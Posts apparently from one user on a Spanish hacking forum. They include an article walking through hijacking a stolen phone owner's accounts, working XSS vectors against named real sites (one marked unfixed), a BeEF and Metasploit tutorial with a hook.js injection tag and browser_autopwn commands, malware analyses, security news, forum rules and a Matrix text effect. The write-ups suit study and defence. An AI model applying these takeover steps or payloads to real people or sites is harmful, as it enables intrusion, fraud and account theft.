¿Pero que podemos hacer con una cuenta de Google? Por el momento acceder a todos los servicios asociados: Google+, GoogleDocs, Gmail, etc. Pero quizá uno de los más interesantes para un atacante pueda ser el Google Wallet, el cual te permite comprar productos, como: teléfonos móviles, tabletas, música o aplicaciones entre otros.

¿Y qué tal si para probar compramos un Nexus 5? Tras hacer login en la web de Google Wallet y añadir una nueva dirección de envío (la mía claro), procedemos a hacer la compra:



Ya tengo un segundo móvil nuevo, pero continuemos para bingo, lo siguiente que haríamos es secuestrarle las cuentas de sus redes sociales, por ejemplo vamos a probar con Facebook, siendo aplicable al resto de ellas (LinkedIn, Twitter...).

Aquí podemos hacer 2 cosas para obtener el usuario de Facebook, o bien mirarlo en la propia aplicación del móvil sustraído o utilizar un pequeño truco en la página web de esta red social. El truco consiste en dado un correo electrónico obtener su usuario asociado, utilizando para ello el formulario de "¿Has olvidado tu contraseña?"



Como ejemplo he utilizado un correo electrónico totalmente aleatorio No tienes permitido ver enlaces. Registrate o Entra a tu cuenta el cual dada la gran cantidad de usuarios que Facebook posee existe como perfil. Animo al lector cuando se aburra a introducir algunos de forma aleatoria, suele ser interesante ver las fotos y nombres que la gente se pone.

En nuestro caso no hubiéramos puesto el correo de "peter12" sino la cuenta de Gmail obtenida del teléfono. Como pueden ver en la imagen anterior, en la segunda opción nos invita a enviarnos un enlace de cambio de contraseña a nuestra cuenta de correo previamente secuestrada. Magnífico ya tenemos su Facebook, nuevamente ¿qué podemos hacer con una cuenta de Facebook...? Pues en primer lugar tocarle el bolsillo por ejemplo comprando en su nombre servicios de esta red (siempre que tuviera claro, la tarjeta de crédito previamente introducida).


¿Qué más se puede hacer con una cuenta de Facebook?, pues como esto de la autenticación con una única cuenta está de moda y gracias a esta red social es posible hacer login con sus credenciales en numerosas Webs, vamos por ejemplo a secuestrarle su cuenta de Spotify. Destacar que podríamos hacernos con cualquier servicio que utilice Facebook como validador.


Pero no todo queda aquí, ¿y si vamos ahora a por su operador móvil?

Seguimos con la sangría, después de suplantar su identidad en Gmail, en Facebook y en Spotify, en las dos entradas anteriores de esta serie.

Ahora vamos ahora a por su operador móvil, en este punto, el proceso de recuperación de contraseña es todavía más fácil, ya que nos va a remitir la compañía ¡un SMS gratuito! (¡bien! por lo menos no le cobraran al pobre chaval), mediante el cual se podrá acceder a la parte de gestión de la cuenta.


Y... ¿qué se puede hacer en la parte de clientes...? No me va hacer falta ni escribirlo ahí lo tienen:


De este servicio nos puede interesar la obtención de su DNI, para hacer posibles logins en otras Webs o incluso sustraer parte de su número de cuenta bancaría.


No voy a comentar ni siquiera el peligro que tiene hacerse con la cuanta de Amazon... pero ahí va lo que necesitas para "recuperar/secuestrar" una cuenta...


Por último porque esto puede ser un no parar, vamos a por los servicios de la administración pública No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, esto es lo necesario para poder recuperar la contraseña del usuario:


Recordar también, la importancia de establecer un código o patrón de acceso al terminal y proceder a su borrado remoto en caso de pérdida.

Fuente: securityartwork
#64
Wargames y retos / Reto XSS [Fácil]
Agosto 02, 2014, 12:20:16 PM
Hola todos!!

Como ya dije, iba a ir subiendo poco a poco retos con más dificultad, hoy toca el nivel Fácil

Consiste en mostrar un alert con su nick del foro y postear la imagen sin que se vea el payload.

Se ruega que no tiren ningún scanner para evitar que cancelen el hosting.

El hosting ha empezado a bloquear todos los payloads que contengan la palabra script, así que inyectar de otras formas que el reto sigue siendo muy fácil. Si introduces un payload bloqueado se te reedirigirá al index

URL:No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

GANADORES
1. MagoAstral
2. Kastrohack
3. Jimeno




Reto cerrado, aún se podrá hacer, pero ya no habrán nuevas incorporaciones a los ganadores.

Solución: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#65
Wargames y retos / Reto XSS [Muy Muy Fácil]
Julio 31, 2014, 07:53:28 AM
Hola todos!!

Como no hay mucha actividad en cuanto a retos nuevos y no tengo mucho tiempo voy a ir haciendo retos (de muy fácil a cada vez más dificil) cada vez que tenga un ratito, empezamos por el muy muy fácil, pensado en los usuarios que empiezan en ese mundillo, como dije ya se irán complicando...

Consiste en mostrar un alert con su nick del foro y postear la imagen sin que se vea el payload.

Se ruega que no tiren ningún scanner para evitar que cancelen el hosting.

El hosting ha empezado a bloquear todos los payloads que contengan la palabra script, asi que inyectar de otras formas que el reto sigue siendo muy fácil

URL:No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Imagen:

Un saludo.

GANADORES
1. Jimeno
2. WhiZ
3. Kid_goth
4. Distress
5. Pr0ph3t (Vía Whatsapp)




Reto cerrado, aún se podrá hacer, pero ya no habrán nuevas incorporaciones a los ganadores.

Solución: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#66
Hacking ShowOff / [XSS] Internautas.org
Julio 07, 2014, 02:44:13 PM


  • URL No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
  • Reportado: Si, y FIXEADO.
  • Vector: <script>alert('@alvarodh5');</script> (Con X-Forwarded-For:)

Un saludo.
#67
Hacking ShowOff / [XSS] Babylon.com
Julio 07, 2014, 02:40:10 PM


  • URL No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
  • Reportado: Si, y NO FIXEADO.
  • Vector: '><img src=x onerror=prompt(document.cookie)>

Un saludo.
#68
Hacking ShowOff / [XSS] shopping.groupon.es
Julio 07, 2014, 02:31:55 PM


  • URL No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
  • Path afectado: Buscador
  • Reportado: Si, fixeado y modificación en la web esta semana.
  • Vector:'><img src=x onerror=prompt(10)>

#69
Jaime Sánchez y Pablo San Emeterio, dos ingenieros informáticos expertos en ciberseguridad, han conseguido quebrar el código de WhatsApp para modificar el remitente de un mensaje; para simular que alguien envió unas líneas a nuestro teléfono móvil.

"Nuestro día a día es buscar vulnerabilidades que pueden ser explotadas por delincuentes para afectar la seguridad de personas y empresas", dice la pareja, que lleva un par de años explorando los fallos de WhatsApp. Desde entonces han descubierto cómo espiar conversaciones, han descifrado contraseñas, fabricado mensajes malignos que consiguen que un móvil deje de funcionar... Todas estas debilidades, que han hecho públicas en distintas ponencias internacionales, han sido parcheadas por la empresa con más o menos rapidez.

Pero a su último descubrimiento aún no se ha puesto solución. "Modificar el remitente de un mensaje podría tener todo tipo de implicaciones, tanto cotidianas como legales, en temas de divorcios, de extorsiones...", explican los expertos. "Por ejemplo, se podría presentar una denuncia por amenazas ofreciendo como prueba falsos mensajes de alguien a cuyo teléfono ni siquiera hemos tenido acceso físico". Basta con saber su número. El teléfono que se hackea es el receptor del mensaje, que hace ver que han llegado mensajes de números que jamás enviaron nada.

Se trata, en todo caso, de una grieta de difícil acceso para el usuario medio. "No es algo que pueda hacer nuestro amigo informático de turno", añadía la información de Softonic. "Pero pone en entredicho la seguridad de WhatsApp y, desde luego, lo descarta como un medio válido para probar algo a nivel legal".

Video: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Fuente: sociedad.elpais
#70

Dos piratas informáticos prometen demostrar cómo es posible quitarles el anonimato a los usuarios del navegador anónimo Tor durante la conferencia de 'hackers' Black Hat 2014, que tendrá lugar el próximo agosto en EE.UU.

"Demostraremos cómo es posible usar las bases de datos distribuidas y los fallos recién descubiertos en el diseño y la implementación de la red de Tor para destruir su anonimato", dicen Alexánder Volynkin y Michael McCord en la presentación de su demostración en la página del evento.

Con "unos servidores potentes y un par de enlaces gigabit", que suelen tener a su disposición las agencias de inteligencia o los grupos 'hacktivistas', se puede revelar a los usuarios de Tor "dentro de un par de meses" y con un presupuesto modesto de tan solo 3.000 dólares, aseguran Volynkin y McCord en su presentación."No necesitas ser la NSA para 'hackear' Tor: descubrir a los usuarios con poco presupuesto".

Volynkin, que es un investigador científico, y McCord, un analista de vulnerabilidad del software, no han revelado todavía muchos detalles, pero los usuarios de Tor esperan que hayan avisado a los desarrolladores de Tor sobre los posibles puntos débiles del navegador que podrían poner en riesgo a millones sus usuarios, escribe 'The Daily Dot', añadiendo que los creadores de Tor no han reaccionado oficialmente a la noticia.

Fuente: actualidad.rt
#71
Hola a todos Underc0ders, el otro día estaba navegando por internet cuando encontré otro de los millones de ficheros curiosos que hay.

No pude analizarlo al 100% pero me llamó bastante la atención su funcionalidad, aquí os dejo lo poco que descubrí:

Este es el archivo en cuestión y sus propiedades:


Y estos los movimientos que realiza al ejecutarse:


Justo después de ejecutarlo se inician automáticamente 2 notepads y se inicia el mozilla firefox.




Si visitaba la url que nos decía, nos contaba que teníamos que pagar 500$ para que los archivos volviesen a su normalidad. Además si no pagabas en 12Horas (creo recordar) ese precio iría subiendo exponencialmente....

Por lo que decidí ejecutar Wireshark y ver si hacía alguna conexión de algún tipo y a donde.


Dominio e Ip involucrados:
dominikanabestplace.com
199.188.206.202

Estas direcciones, estaban y están caídas.

Por lo que... realmente el malware hacía lo que verdaderamente dice? A mi personalmente no me bloqueó ningún archivo, así que con los resultados obtenidos, pienso que realmente no hacía nada, tan solo provocar a que la víctima pagase...

Cabe mencionar de que se ejecutó en un entorno controlado.

Un saludo.

Blackdrake
#72
Hola todos, como todos sabemos, los malwares de hoy en día, son mucho más peligrosos, más difíciles de detectar y con mayor capacidad de destrucción. Por lo que os voy a "enseñar" a analizar algún archivo del que desconfieis.

Cabe destacar, que todo el contenido del post, está realizado por mi, (menos los dos archivos, que como menciono más adelante, encontré por internet.), el post fué realizado en un entorno controlado (sandbox) ya que estaba 100% seguro de que se trataba de malware.

Navegando por internet, encontré dos archivos, cuyos nombres eran: taskab.exe y taskaa.exe, puesto a que los nombres no me transmitían demasiada confianza decidí descargarlos y analizarlos con mi antivirus.


Como ya se esperaba, saltó el mensaje "NO SE HA DETECTADO AMENAZA", pero como bien sabemos, los antivirus no son infalibles.

El siguiente paso, era abrirlos con el editor hexadecimal, buscando palabras claves como: no-ip etc..., como no se encontraron resultados y leer todo el código desde el editor es un follón, decidí subirlos a No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, que nos proporciona un gran servicio y nos muestra todos los movimientos del malware, Normalmente, lo subo a malwr antes de ejecutarlo para conocer los movimientos del fichero.

Resultados del fichero  taskaa.exe

Resultados del fichero  taskab.exe

Como podemos observar, se crean varios archivos entre otras cosas.

Llegamos a este punto, es hora de ejecutar los ficheros, no sin antes, controlar los procesos con una herramienta.

El resultado de ejecutar estos dos archivos fué el siguiente:


Justo después de esa acción, saltaron 2 o 3 avisos más y se reinició automáticamente la máquina, después del reinicio, continué con el análisis...

Basándome en los resultados de malwr y de la última screen, busqué el directorio uWr90Eb

Accedí aC:\Users\Blackdrake pero no estaba ese directorio, pensé que podía estar oculto, por lo que ejecuté el siguiente comando en el cmd: attrib -r -s -h *.* /s /d

Ahora ya podía visualizar el directorio y los archivos que habían en su interior.


Allí había otro ejecutable, mftRy.exe, de la misma manera que antes, lo subí a malwr para ver los movimientos, acto seguido, ejecuté el fichero, no habían cambios aparentes, por ese motivo, inicié WireShark, para poder visualizar la ip donde enviaba el malware los datos.

Después de ver varias conexiones, encontré esta:


Como ya tenía la IP a la que se enviaban los datos, accedí a ella pero como de costumbre, me encontré con esta web:


El siguiente paso, era buscar el dominio al que tenía asociado esa IP:


Si accedía al nombre de dominio que me proporcionaba el comando nslookup acababa en la misma web que antes, ya que no era el dominio, si no el dns del hosting :/

Se me ocurrió, buscar la IP por google, a ver si tenía más suerte y encontraba algo...

En el tercer o cuarto enlace, encontré algo bastante interesante:


Ya tenía el dominio asociado a la IP, el siguiente paso era acceder para ver si me reedirigia a la misma página o no... Este es el contenido que pude visualizar.


Supuse que los diferentes directorios, eran infectados, asi que empecé a visualizar uno por uno.

Al llegar al segundo enlace, esto es lo que encontré:


En su interior contenía lo poco que había conseguido de mi máquina.


Como pueden comprobar era mi máquina ya que la IP, versión, antivirus eran los mismos.



Un saludo y gracias por visualizar el post.


#73
Hacking / Instalando Beef + Metasploit
Julio 30, 2013, 12:56:01 PM
Bueno, hoy os traigo un tutorial, es bastante básico pero lo busqué para ver si estaba y no lo encontré asique os lo hago para vosotros ;D

Vamos a empezar por descargar el beef --> No tienes permitido ver enlaces. Registrate o Entra a tu cuenta o No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Para que funcione, necesitamos tener instalado las siguientes depencias: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta (os lo detallaría más, pero no se que s.o usáis cada uno xD)


Una vez todo instalado, vamos a integrarlo con metasploit, para ello vamos al directorio donde tenemos los archivos del beef.



Localizamos el fichero config.yaml y lo abrimos, vamos a la línea 113 o bien buscamos la palabra "metasploit"

Y lo activamos de esta manera:

Código: text
metasploit:
enable: true


Grabamos el archivo y nos dirigimos de nuevo al directorio del beef después a extensions/metasploit y buscamos un fichero que se llama config.yaml

Modificamos las líneas introduciendo la IP de nuestro ordenador. Para evitar conflictos por si nuestra IP cambia, pondremos 127.0.0.1

Código: text
host: "127.0.0.1"



Una vez configurados los dos archivos, ejecutamos metasploit:



Una vez se haya cargando, introducimos lo siguiente: (Teneis que ponerlo respecto a como tengais el config.yaml de /extensions/metasploit)

Código: text
load msgrpc SeverHost=127.0.0.1 Pass=abc123





Una vez hayamos hecho esto, vamos a ejecutar beef, para ello accedemos al directorio y lo ejecutamos de esta manera.

Código: text
./beef -x -v




Esperamos a que cargue, una vez finalizado, podemos ver la dirección de nuestro panel:



Accedemos a esa dirección y nos logueamos:

Usuario: beef
Contraseña: beef



Ahora vamos a infectar a una máquina, en mi caso seré yo mismo xD

Para infectar a una máquina hay que conseguir que cargue el fichero hook.js, para ello en una página web habría que introducir lo siguiente:

Código: text
<script src="http://192.168.1.34:3000/hook.js"></script>


Una vez tengamos a la máquina en el panel podemos iniciar el ataque.




Como vemos, en el apartado de metasploit nos salen los exploits, ya que lo hemos implementado anteriormente.


Otro método de ataque es cargar el autopwn de metasploit y luego redirigir a la víctima a la dirección del autopwn:

Para cargarlo, vamos a la consola de metasploit e introducimos estos parámetros:

use auxiliary/server/browser_autopwn (Usar el modulo browser_autopwn)
set lhost 192.168.1.34 (IP del Atacante)
set srvhost 192.168.1.34 (IP del Atacante)
set uripath / (Path del link a enviar)
set srvport 8080 (Puerto)
exploit



Y esperamos a que termine de cargar... (en un ataque se recomienda tener ya el autopwn cargado ya que tarda).



Una vez cargando, vamos a redirigir a la víctima a la página que nos genera el autopwn:






Posibles errores al ejecutar beef.



Solución:

-Actualizar Ruby o bien:





Visitar: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta si teneis ese error, para instalar rvm


Y eso es todo, ya tendríamos el beef integrado con metasploit y perfectamente funcionando ;D

Un saludo.



#74
International forum / General Rules Forum
Julio 28, 2013, 01:11:13 PM


General Rules Forum

[1] Before creating a new message please use the search function on the top of the forum, likely your doubt has been answered before, so by this way we avoid the redundancy of posts.

[2] SPAM isn't allowed. Projects unrelated to the forum are considered spam too. Religion and policy is prohibited too.

[3]  NOT allow any advertising of other sites or images promoting it, or link to any external site underc0de unless a direct download. Also sales are prohibited within the forum under any circumstances.

[4]  When you start making a post, always use descriptive titles.

[5] NOT write posts in capital letters, or illegible, either by color or any other reason.

[6] This is a forum, not a phone. No abbreviations or write big words.

[7] Must not be opened or repeated themes with the same goal, eventually, is where your message is found, it will be read.

[8] Well sure where you write a topic where it belongs, use the sub-forums for specific topics.

[9] Is forbidden in old subjects respond unless it is for justifiable cause. Considering the past 120 days old since the last reply.

[10] Be respectful and polite with other forum users. We intend that the forum is a meeting place to request / provide help to all web users. Not allow insults or disrespectful to any member of the community, otherwise this will lead to a penalty the user aggressor.

[11] You may not use the private messaging system to send advertising / propaganda. Those affected see such messages are encouraged to report it to a member of Staff.

[12] Problems of users outside the community, will not be affected in the forum.

[13] In case of an insult or disrespectful to any authority of the community will take action depending on each case.

[14]  Prohibits the distribution of material posted on forums without right of its respective author. Both of the manuals, guides and tutorials as the structure of the site.

[15] The placing of links and websites for user's own benefit systems proving points or money for each entry.

[16] The burden of malicious files so is punishable INTENTIONAL (Malware).

[17] All posts must be at least 1 picture.

[18] All questions must go to General Questions section to avoid mixing with posts.

The rules are subject to change without notice, however be advised by message so that users are aware of them.

The Forum Staff reserves the right to close, edit or delete any item that does not meet the standards set forth herein.

Kind Regards, Undercode Staff
#75
Hoy en día, hay muchas webs que están infectadas por malwares estos atacan solo a unos cuantos navegadores vulnerables, en este tutorial vamos a aprender a reconocer una web infectada.

Lo primero que necesitamos es una web, pero recordar, tenemos sospechas de que está infectada por lo que no vamos a acceder a ella, directamente bajaremos su código fuente:

NOTA: He borrado la dirección de la web infectada por motivos de seguridad.

Código: text
wget www.sitioweb.com






Una vez tenemos el código fuente de la web, vamos a probar cambiando el user-agent

Podemos obtener una lista desde aqui: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Elegimos un user-agent, yo escogí este:

Código: text
Mozilla/5.0 (Windows NT 6.2; Win64; x64;) Gecko/20100101 Firefox/20.0


Ahora volvemos a hacer lo mismo pero añadiendo este parámetro:

Código: text
wget www.sitioweb.com --user-agent "Mozilla/5.0 (Windows NT 6.2; Win64; x64;) Gecko/20100101 Firefox/20.0"




Comparamos los diferentes archivos en busca de diferencias:




Observamos que el archivo con diferente user-agent tiene javascript ofuscado... vamos a desofuscar ese javascript para saber que contiene! :)

Para hacer rápido el tutorial y para que lo puedan hacer los más iniciados en este tema, recomiendo subir el javascript a esta web: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta





Como vemos, ahí está el verdadero javascript, para evitar entrar a la web, analizaremos la url...



Bueno, después de este analisis, llegamos a la conclusión de que la web está infectada, podríamos analizar a fondo la dirección que nos sale del código, pero en este caso no es necesario porque tenemos la seguridad de que se trata de un malware.

Un saludo.
#76
Zona Webmaster / [JavaScript][BASICO] Efecto Matrix
Julio 20, 2013, 08:29:52 AM
Aquí les dejo el código que simula matrix, muy bueno para titulos o incorporarlo a algún banner:

Código: javascript
<style type="text/css">
.matrix { font-family:Lucida Console, Courier, Monotype; font-size:10pt; text-align:center; width:10px; padding:0px; margin:0px;}
</style>

<script type="text/javascript" language="JavaScript">

<!--
var rows=11; // must be an odd number
var speed=50; // lower is faster
var reveal=2; // between 0 and 2 only. The higher, the faster the word appears
var effectalign="default" //enter "center" to center it.
var w3c=document.getElementById && !window.opera;;
var ie45=document.all && !window.opera;
var ma_tab, matemp, ma_bod, ma_row, x, y, columns, ma_txt, ma_cho;
var m_coch=new Array();
var m_copo=new Array();
window.onload=function() {
if (!w3c && !ie45) return
  var matrix=(w3c)?document.getElementById("matrix"):document.all["matrix"];
  ma_txt=(w3c)?matrix.firstChild.nodeValue:matrix.innerHTML;
  ma_txt=" "+ma_txt+" ";
  columns=ma_txt.length;
  if (w3c) {
    while (matrix.childNodes.length) matrix.removeChild(matrix.childNodes[0]);
    ma_tab=document.createElement("table");
    ma_tab.setAttribute("border", 0);
    ma_tab.setAttribute("align", effectalign);
    ma_tab.style.backgroundColor="#000000";
    ma_bod=document.createElement("tbody");
    for (x=0; x<rows; x++) {
      ma_row=document.createElement("tr");
      for (y=0; y<columns; y++) {
        matemp=document.createElement("td");
        matemp.setAttribute("id", "Mx"+x+"y"+y);
        matemp.className="matrix";
        matemp.appendChild(document.createTextNode(String.fromCharCode(160)));
        ma_row.appendChild(matemp);
      }
      ma_bod.appendChild(ma_row);
    }
    ma_tab.appendChild(ma_bod);
    matrix.appendChild(ma_tab);
  } else {
    ma_tab='<ta'+'ble align="'+effectalign+'" border="0" style="background-color:#000000">';
    for (var x=0; x<rows; x++) {
      ma_tab+='<t'+'r>';
      for (var y=0; y<columns; y++) {
        ma_tab+='<t'+'d class="matrix" id="Mx'+x+'y'+y+'"> </'+'td>';
      }
      ma_tab+='</'+'tr>';
    }
    ma_tab+='</'+'table>';
    matrix.innerHTML=ma_tab;
  }
  ma_cho=ma_txt;
  for (x=0; x<columns; x++) {
    ma_cho+=String.fromCharCode(32+Math.floor(Math.random()*94));
    m_copo[x]=0;
  }
  ma_bod=setInterval("mytricks()", speed);
}

function mytricks() {
  x=0;
  for (y=0; y<columns; y++) {
    x=x+(m_copo[y]==100);
    ma_row=m_copo[y]%100;
    if (ma_row && m_copo[y]<100) {
      if (ma_row<rows+1) {
        if (w3c) {
          matemp=document.getElementById("Mx"+(ma_row-1)+"y"+y);
          matemp.firstChild.nodeValue=m_coch[y];
        }
        else {
          matemp=document.all["Mx"+(ma_row-1)+"y"+y];
          matemp.innerHTML=m_coch[y];
        }
        matemp.style.color="#33ff66";
        matemp.style.fontWeight="bold";
      }
      if (ma_row>1 && ma_row<rows+2) {
        matemp=(w3c)?document.getElementById("Mx"+(ma_row-2)+"y"+y):document.all["Mx"+(ma_row-2)+"y"+y];
        matemp.style.fontWeight="normal";
        matemp.style.color="#00ff00";
      }
      if (ma_row>2) {
          matemp=(w3c)?document.getElementById("Mx"+(ma_row-3)+"y"+y):document.all["Mx"+(ma_row-3)+"y"+y];
        matemp.style.color="#009900";
      }
      if (ma_row<Math.floor(rows/2)+1) m_copo[y]++;
      else if (ma_row==Math.floor(rows/2)+1 && m_coch[y]==ma_txt.charAt(y)) zoomer(y);
      else if (ma_row<rows+2) m_copo[y]++;
      else if (m_copo[y]<100) m_copo[y]=0;
    }
    else if (Math.random()>0.9 && m_copo[y]<100) {
      m_coch[y]=ma_cho.charAt(Math.floor(Math.random()*ma_cho.length));
      m_copo[y]++;
    }
  }
  if (x==columns) clearInterval(ma_bod);
}

function zoomer(ycol) {
  var mtmp, mtem, ytmp;
  if (m_copo[ycol]==Math.floor(rows/2)+1) {
    for (ytmp=0; ytmp<rows; ytmp++) {
      if (w3c) {
        mtmp=document.getElementById("Mx"+ytmp+"y"+ycol);
        mtmp.firstChild.nodeValue=m_coch[ycol];
      }
      else {
        mtmp=document.all["Mx"+ytmp+"y"+ycol];
        mtmp.innerHTML=m_coch[ycol];
      }
      mtmp.style.color="#33ff66";
      mtmp.style.fontWeight="bold";
    }
    if (Math.random()<reveal) {
      mtmp=ma_cho.indexOf(ma_txt.charAt(ycol));
      ma_cho=ma_cho.substring(0, mtmp)+ma_cho.substring(mtmp+1, ma_cho.length);
    }
    if (Math.random()<reveal-1) ma_cho=ma_cho.substring(0, ma_cho.length-1);
    m_copo[ycol]+=199;
    setTimeout("zoomer("+ycol+")", speed);
  }
  else if (m_copo[ycol]>200) {
    if (w3c) {
      mtmp=document.getElementById("Mx"+(m_copo[ycol]-201)+"y"+ycol);
      mtem=document.getElementById("Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol);
    }
    else {
      mtmp=document.all["Mx"+(m_copo[ycol]-201)+"y"+ycol];
      mtem=document.all["Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol];
    }
    mtmp.style.fontWeight="normal";
    mtem.style.fontWeight="normal";
    setTimeout("zoomer("+ycol+")", speed);
  }
  else if (m_copo[ycol]==200) m_copo[ycol]=100+Math.floor(rows/2);
  if (m_copo[ycol]>100 && m_copo[ycol]<200) {
    if (w3c) {
      mtmp=document.getElementById("Mx"+(m_copo[ycol]-101)+"y"+ycol);
      mtmp.firstChild.nodeValue=String.fromCharCode(160);
      mtem=document.getElementById("Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol);
      mtem.firstChild.nodeValue=String.fromCharCode(160);
    }
    else {
      mtmp=document.all["Mx"+(m_copo[ycol]-101)+"y"+ycol];
      mtmp.innerHTML=String.fromCharCode(160);
      mtem=document.all["Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol];
      mtem.innerHTML=String.fromCharCode(160);
    }
    setTimeout("zoomer("+ycol+")", speed);
  }
}
// -->
</script>
<div id="matrix">Blackdrake</div>


Solo hay que editar el texto que dice Blackdrake por el que quieran.

Un saludo :)